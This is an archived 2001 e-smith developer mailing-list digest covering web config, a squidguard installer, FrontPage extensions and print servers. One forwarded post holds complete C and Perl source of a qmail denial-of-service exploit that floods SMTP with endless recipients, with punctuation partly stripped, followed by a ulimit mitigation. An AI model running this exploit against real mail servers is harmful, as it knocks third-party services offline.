[e-smith-devinfo] E-Smith Database

2001-08-01 Thread Lee Irving

Could anyone point me in the right direction of documentation on how
E-smith stores its configuration for its internal and external
web-sites. I would like to be able to switch off externally facing web
sites as they are not required.

Thanks in advance

Lee Irving

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RE: [e-smith-devinfo] E-Smith Database

2001-08-01 Thread Jelmer Kuperus

you'll probably want to take a loot at the template for httpd.conf
there should be a number of virtual hosts there 

by deleting the entries for the external ip you disallow access to the
website
this'll work for sure but i am not sure this is the essg :) way to do it.



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Sent: woensdag 1 augustus 2001 9:55
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Subject: [e-smith-devinfo] E-Smith Database


Could anyone point me in the right direction of documentation on how
E-smith stores its configuration for its internal and external
web-sites. I would like to be able to switch off externally facing web
sites as they are not required.

Thanks in advance

Lee Irving

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RE: [e-smith-devinfo] Release 1 of squidguard for ESSG

2001-08-01 Thread Jelmer Kuperus

this essg thing is really catching on :)

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From: Trevor Ouellette [mailto:[EMAIL PROTECTED]]
Sent: woensdag 1 augustus 2001 7:26
To: DEVELOPMENT info
Subject: [e-smith-devinfo] Release 1 of squidguard for ESSG


How to Install the gc-guard system -- Any beta testers??

Log in as root to your ESSG server.

mkdir /squidguard
cd /squidguard
wget -nv http://www.greencomputer.com/gc-guard-1.tar
tar -xf gc-guard-1.tar
./create-squidguard

That's it!  The settings can be found under Security, Content Filtering.
There is link to a help at the bottom of that page.

It updates it's blacklist once a week, administrators can update/remove
domains, expressions and URL's from a GUI in the manager, admins can also
allow specific IP's to have Full access to the Internet instead of the
default filtered access.

Give it a go... GRIN

Thanks to Darrell May, JL (for the sudo stuff), and of course Lorenzo!  I
hope I didn't forget anybody!

Trev.


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Re: [e-smith-devinfo] Release 1 of squidguard for ESSG

2001-08-01 Thread Bertrand CHERRIER

Hello Trevor Ouellette,

Looks exactly like the one I needed !!!
Great job !
I only had this : ./create-squidguard: /sbin/signal-event: No such file or directory
But that was I guess because my squid wasn't running...
And in the end : Please reboot your server now (WHY WOULD I )
Everything is working by the book it's great !

Thanks

mercredi 1 août 2001, 16:26:04, vous avez écrit:

TO How to Install the gc-guard system -- Any beta testers??

TO Log in as root to your ESSG server.

TO mkdir /squidguard
TO cd /squidguard
TO wget -nv http://www.greencomputer.com/gc-guard-1.tar
TO tar -xf gc-guard-1.tar
TO ./create-squidguard

TO That's it!  The settings can be found under Security, Content Filtering.
TO There is link to a help at the bottom of that page.

TO It updates it's blacklist once a week, administrators can update/remove
TO domains, expressions and URL's from a GUI in the manager, admins can also
TO allow specific IP's to have Full access to the Internet instead of the
TO default filtered access.

TO Give it a go... GRIN

TO Thanks to Darrell May, JL (for the sudo stuff), and of course Lorenzo!  I
TO hope I didn't forget anybody!

TO Trev.

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Re: [e-smith-devinfo] Server monitoring module ready for download

2001-08-01 Thread Jaime Nebrera Herrera

  Hi Lee,

  I don't know what's wrong. We have tested the rpm at least 10 times (5
times installing in a fresh ESGS 4.1.2 server and the other 5 removing
it and installing again). I don't know why it asks you to change the
password because it just install 1 file in the functions directory and
makes a soft link in the panels directory (as is standard in ESGS).

  The process we follow is:

As root:

rpm -Uvh sysstat-3.3.3-3.i386.rpm
rpm -Uvh rrdtool-1.0.28-1.i386.rpm
rpm -Uvh e-smith-monitor-1.0-01.noarch.rpm
refresh the web manager page

  I don't know if this is the best way to do it, but for us it has
worked perfectly right (as commented in the documentation, there is a
minor bug that leaves an empty /var/lib/rrd in the system when you
uninstall, but thats all).

  We have a test server and currently have installed in it ESGS 4.1.2,
Smoothwall 0.98 and Start Up Server 3.0b6 so we have formated the server
many times and reinstall the packages and never had a problem (once we
finished the rpm, at the beginning was horrible :)

  Sorry, maybe somebody from ES will be able to help you more. I'm a
linux newbie myself :

  BTW, it should work in a 4.0 server too, because thats where we made
the first development efforts 3 months ago.

Lee Roy escribió:
 
 ok... guys, just a quick update. it's up and running fine now. i just did a
 few reboots, and a
 --force re-install. now it is working fine. but i still have the default
 password thing i don't know how to fix. any help on that?
 
 thanks
 lee roy

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[e-smith-devinfo] Frontpage 2000 extentions

2001-08-01 Thread Trevor Ouellette

Anyone install FP2000 extentions on ES?  Any problems (besides the horific
security issues)?

FP2000 is my next project... so if anyone has done any work on FP
extentions, please forward your stuff my way.

Trev.


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Re: [e-smith-devinfo] Frontpage 2000 extentions

2001-08-01 Thread Wayne Bollinger

Months ago I took the RH 7.0 Apache 1.3.14 src rpm and got the FP2000
extensions working on 4.1; I referred to the improved mod_frontpage
instructions at:

  http://home.edo.uni-dortmund.de/~chripo/

It works fine if you configure ES/Apache/FP to use only the primary
ibay; things get very messy with multiple virtual domains/ibays.

Disclaimer:  I never deployed this on a production server due to the
security concerns, and certainly don't recommend that anyone else do
so.  

If you want to use my src rpm(s) as a starting point I can clean things
up and send you a copy.  I appreciate all your work on squidgard.

-Wayne Bollinger

Trevor Ouellette wrote:
 
 Anyone install FP2000 extentions on ES?  Any problems (besides the horific
 security issues)?
 
 FP2000 is my next project... so if anyone has done any work on FP
 extentions, please forward your stuff my way.
 
 Trev.

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Re: [e-smith-devinfo] Frontpage 2000 extentions

2001-08-01 Thread ed sharpe

if you have multiple domains it seems you have to have the main  set but
each virtual domain has to have a 'stub' set. I have studied it some but
need to implement them myself as the museum's web pages uses front page ext.
for the fancy stuff

ed sharpe
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From: Wayne Bollinger [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, August 01, 2001 1:00 PM
Subject: Re: [e-smith-devinfo] Frontpage 2000 extentions


 Months ago I took the RH 7.0 Apache 1.3.14 src rpm and got the FP2000
 extensions working on 4.1; I referred to the improved mod_frontpage
 instructions at:

   http://home.edo.uni-dortmund.de/~chripo/

 It works fine if you configure ES/Apache/FP to use only the primary
 ibay; things get very messy with multiple virtual domains/ibays.

 Disclaimer:  I never deployed this on a production server due to the
 security concerns, and certainly don't recommend that anyone else do
 so.

 If you want to use my src rpm(s) as a starting point I can clean things
 up and send you a copy.  I appreciate all your work on squidgard.

 -Wayne Bollinger

 Trevor Ouellette wrote:
 
  Anyone install FP2000 extentions on ES?  Any problems (besides the
horific
  security issues)?
 
  FP2000 is my next project... so if anyone has done any work on FP
  extentions, please forward your stuff my way.
 
  Trev.

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Re: [e-smith-devinfo] network print servers

2001-08-01 Thread Hartmut Trepkau

Am 31 Jul 2001, um 23:35 hat Thomas E. Keiser geschrieben:

Hi Tom,

Both ways are possible, the clients can print directly to an IP-
number ( 192.168.1.200 ) as printerport, but if one client sends a 
big printjob all other clients have to wait due to the low memory of 
the PrtSrv or Printer. The better way is to let the e-smith box do the 
spooling, the printjobs from any client are done within seconds. By 
adding a printer entry into the e-smith server, this printer becomes 
a SAMBA shared printer and your clients can see this printer in the 
network neigborhood. In /var(log/ldp/printerXX you have an 
accounting log if you like or have to use it.

cheers
Hartmut
  
 Hartmut:
 
 In thinking about your advice, I'm uncertain why you add a printer
 entry in the e-smith server. Does that mean there's a master list
 for people to choose from, or does it mean the essg will do some
 print spooling, or what? I would expect the communication for a
 print job would only be between the client machine doing the print
 job, and the JetDirect, for instance, attached to the actual
 printer. Am I
 wrong?
 
 Thanks,
 
 Tom
 
 Hartmut Trepkau wrote:
 
  Use a printer or printserver with an ethernet port. HP jetdirect or
  similar work great. I also use a NoName box with 1xTCP/IP and 3xLPT
  ports for about $100. Assign an hostentry ( dnj755cm, dj2000c,...)
  within the e-smith-manager for your Printserver outside the range of
  your DHCP range. For DHCP I use 192.168.1.10 to 192.168.1.99. The
  Printservers get a fixed address 192.168.1.200 ,192.168.1.190 etc.
  The best way to configure a HP printserver is, to connect the box
  first to a standalone maschine via a crossovercable. Use telnet or
  your browser to get into the configuration menu of the printserver (
  depends on the software of the server) . Configure the printserver
  to use DHCP, assign the box an IP number ( 192.168.1.200 ) and set
  the hostname entry to a well known name ( dnj755cm, dj2000c,...),
  you can also specify the gateway-address ( 192.168.1.1).. Save the
  settings ! Now your are ready to connect the PrtSrv to your network,
  watch /var/log/messages to see the DHCP request. Ping the PrtSrv
  with the assigned IP-address and ping the PrtSrv with the hostname (
  ping 192.168.1.200 and try also ping dnj755cm ).
 
  The next step is to create an printer entry within the
  e-smith-manager.
 
  Printer name : hpdnj755cm
  Brief description: HP 755cm Plotter at my office
  Location: networkprinter
  Hostname or IP address of network printer: dnj755cm
  Network printer name : raw ( for my NoName box LPT1=lp1,
  LPT2=lp2,...) SAVE the settings.
 
  Install the print drivers on your clint-maschines and connect them
  with the the network path to your PrtSrv.
 


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RE: [e-smith-devinfo] Frontpage 2000 extentions

2001-08-01 Thread Jeff

If you grab a binary of http://httpd.apache.org/dist/httpd/binaries/linux/
and install it (it has an install script and puts it in /usr/local/apache)
set the httpd.conf for this 'new' server to another port, example 8080 and
install frontpage extensions to this server. (I have both the 2000 and 2002
working this way) then you can connect to http://www.domain.com:8080 via
frontpage client, and this doesnt brake or interefere with e-smith at all.
Works great for me with over 70 domains hosted with frontpage.

cputek at home dot com

-Original Message-
From: Wayne Bollinger [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, August 01, 2001 3:01 PM
To: [EMAIL PROTECTED]
Subject: Re: [e-smith-devinfo] Frontpage 2000 extentions


Months ago I took the RH 7.0 Apache 1.3.14 src rpm and got the FP2000
extensions working on 4.1; I referred to the improved mod_frontpage
instructions at:

  http://home.edo.uni-dortmund.de/~chripo/

It works fine if you configure ES/Apache/FP to use only the primary
ibay; things get very messy with multiple virtual domains/ibays.

Disclaimer:  I never deployed this on a production server due to the
security concerns, and certainly don't recommend that anyone else do
so.

If you want to use my src rpm(s) as a starting point I can clean things
up and send you a copy.  I appreciate all your work on squidgard.

-Wayne Bollinger

Trevor Ouellette wrote:

 Anyone install FP2000 extentions on ES?  Any problems (besides the horific
 security issues)?

 FP2000 is my next project... so if anyone has done any work on FP
 extentions, please forward your stuff my way.

 Trev.

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[e-smith-devinfo] Sorry for Return Receipt

2001-08-01 Thread Jeff

I apologize for the return receipt that was attached to my message (as I'm
getting one back every time someone reads the message I posted. :-( I have
removed this 'feature' from my mail client.


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Re: [e-smith-devinfo] Sorry for Return Receipt

2001-08-01 Thread Ed Sharpe

that's ok! I just said no to it anyway!
ed!
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Sent: Wednesday, August 01, 2001 6:24 PM
Subject: [e-smith-devinfo] Sorry for Return Receipt


 I apologize for the return receipt that was attached to my message (as I'm
 getting one back every time someone reads the message I posted. :-( I have
 removed this 'feature' from my mail client.


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[e-smith-devinfo] (Fwd) Qmail, sooo easy to exploit

2001-08-01 Thread Dean Staff

Hey all,

This was posted to the qmail list tonight...

I realize e-smith does not start qmail vi tcpserve, but I though someone 
might want to look at it.

Dean

--- Forwarded message follows ---
Date sent:  01 Aug 2001 21:41:56 -
From:   Steve Wozniak [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject:Qmail, sooo easy to exploit

I'm a little Troll, I'm looking for some servers to exploit. I look
through this list to find the vulnerable qmail servers; you know,
newbies that give out tooo much info because the list regulars like
Frank Tegtmeyer beat up on newbies and pressure them to give out way
too much info.

Any of you guys ever see your company's computer guy on SNL? That is
some funny shit. Well you guys know who you are.

here is some code to try ya'll, once you get the info you need.


 /*
  * qmail-dos-2 - run a qmail system out of swap space by feeding an
  infinite * amount of recipients. * * Usage: qmail-dos-2
  fully-qualified-hostname * * Author: Wietse Venema. The author is
  not responsible for abuse of this * program. Use at your own risk.
  */
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include netdb.h
#include string.h
#include stdarg.h
#include errno.h
#include stdio.h

voidfatal(char *fmt,...)
{
va_list ap;

va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
putc('\n', stderr);
exit(1);
}

chat(FILE * fp, char *fmt,...)
{
charbuf[BUFSIZ];
va_list ap;

fseek(fp, 0L, SEEK_SET);
va_start(ap, fmt);
vfprintf(fp, fmt, ap);
va_end(ap);
fputs(\r\n, fp);
if (fflush(fp))
fatal(connection lost);
fseek(fp, 0L, SEEK_SET);
if (fgets(buf, sizeof(buf), fp) == 0)
fatal(connection lost);
if (atoi(buf) / 100 != 2)
fatal(%s, buf);
}

int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *hp;
charbuf[BUFSIZ];
int sock;
FILE   *fp;

if (argc != 2)
fatal(usage: %s host, argv[0]);
if ((hp = gethostbyname(argv[1])) == 0)
fatal(host %s not found, argv[1]);
memset((char *) sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
memcpy((char *) sin.sin_addr, hp-h_addr, sizeof(sin.sin_addr));
sin.sin_port = htons(25); if ((sock = socket(AF_INET, SOCK_STREAM,
0))  0)
fatal(socket: %s, strerror(errno));
if (connect(sock, (struct sockaddr *)  sin, sizeof(sin))  0)
fatal(connect to %s: %s, argv[1], strerror(errno));
if ((fp = fdopen(sock, r+)) == 0)
fatal(fdopen: %s, strerror(errno));
if (fgets(buf, sizeof(buf), fp) == 0)
fatal(connection lost);
chat(fp, mail from:me@me, fp);
for (;;)
chat(fp, rcpt to:me@%s, argv[1]);
}


/*
-- qmail.pl --
#!/usr/local/bin/perl -w # $Id: qmail.pl,v 1.4 1997/06/12 02:12:42
super Exp $ require 5.002; use strict; use Socket;
if(!($ARGV[0])){print(usage: $0 FQDN,\n);exit;} my $port = 25; my
$proto = getprotobyname(tcp); my $iaddr = inet_aton($ARGV[0]) || die
No such host: $ARGV[0]; my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die socket() $!;
connect(SKT, $paddr)  print(Connected established.\n) || die
connect() $!; send(SKT,mail from: me\@me\n,0) || die send()
$!; my $infstr = rcpt to: me\@ . $ARGV[0] . \n;
print(Attacking..,\n); while(SKT){ send(SKT,$infstr,0) || die
send() $!; } die Connection lost!; --
qmail.pl -- */




/* Here is the Patch for qmail -

If you are using tcpserver it should be sufficient to set the ulimit
once in the startup script.  All instances of qmail-smtpd inherit the
limit without further overhead.  Seems to be working fine here.

   echo Starting tcpserver for qmail-smtpd...
   ulimit -d 2048
   /usr/local/bin/tcpserver -v -u 61 -g 61 0 smtp
   /usr/local/bin/tcpcontrol \
   /etc/tcp.smtp.cdb /var/qmail/bin/qmail-smtpd 21 | \
   /var/qmail/bin/splogger smtpd 3 


*/



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[e-smith-devinfo] Redundant Power Supllies

2001-08-01 Thread Richard Ford

Does anyone know how redundant power supplies or network cards are handled
in Linux or in hardware?

Reason being that in building a new sever with an Athlon MP Tyan SMP DDR
system, it needs a special power supply with special pins.

Now redundant power supplies are always good - but especially when the power
supply is Special.

Redundant network cards - well the MB has two built in.  And we don't need
the bandwidth of the two - so I was wondering how you make them work as fail
over devices?  IP aliases?


Cheers,

Richard Ford.
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The views expressed here are solely my own and do not necessarily represent
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Re: [e-smith-devinfo] Frontpage 2000 extentions

2001-08-01 Thread Ed Sharpe

question why would I go here?  there is apache already in the esmith?
ed sharpe
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Sent: Wednesday, August 01, 2001 6:10 PM
Subject: RE: [e-smith-devinfo] Frontpage 2000 extentions


 If you grab a binary of http://httpd.apache.org/dist/httpd/binaries/linux/
 and install it (it has an install script and puts it in /usr/local/apache)
 set the httpd.conf for this 'new' server to another port, example 8080 and
 install frontpage extensions to this server. (I have both the 2000 and
2002
 working this way) then you can connect to http://www.domain.com:8080 via
 frontpage client, and this doesnt brake or interefere with e-smith at all.
 Works great for me with over 70 domains hosted with frontpage.

 cputek at home dot com

 -Original Message-
 From: Wayne Bollinger [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, August 01, 2001 3:01 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [e-smith-devinfo] Frontpage 2000 extentions


 Months ago I took the RH 7.0 Apache 1.3.14 src rpm and got the FP2000
 extensions working on 4.1; I referred to the improved mod_frontpage
 instructions at:

   http://home.edo.uni-dortmund.de/~chripo/

 It works fine if you configure ES/Apache/FP to use only the primary
 ibay; things get very messy with multiple virtual domains/ibays.

 Disclaimer:  I never deployed this on a production server due to the
 security concerns, and certainly don't recommend that anyone else do
 so.

 If you want to use my src rpm(s) as a starting point I can clean things
 up and send you a copy.  I appreciate all your work on squidgard.

 -Wayne Bollinger

 Trevor Ouellette wrote:
 
  Anyone install FP2000 extentions on ES?  Any problems (besides the
horific
  security issues)?
 
  FP2000 is my next project... so if anyone has done any work on FP
  extentions, please forward your stuff my way.
 
  Trev.

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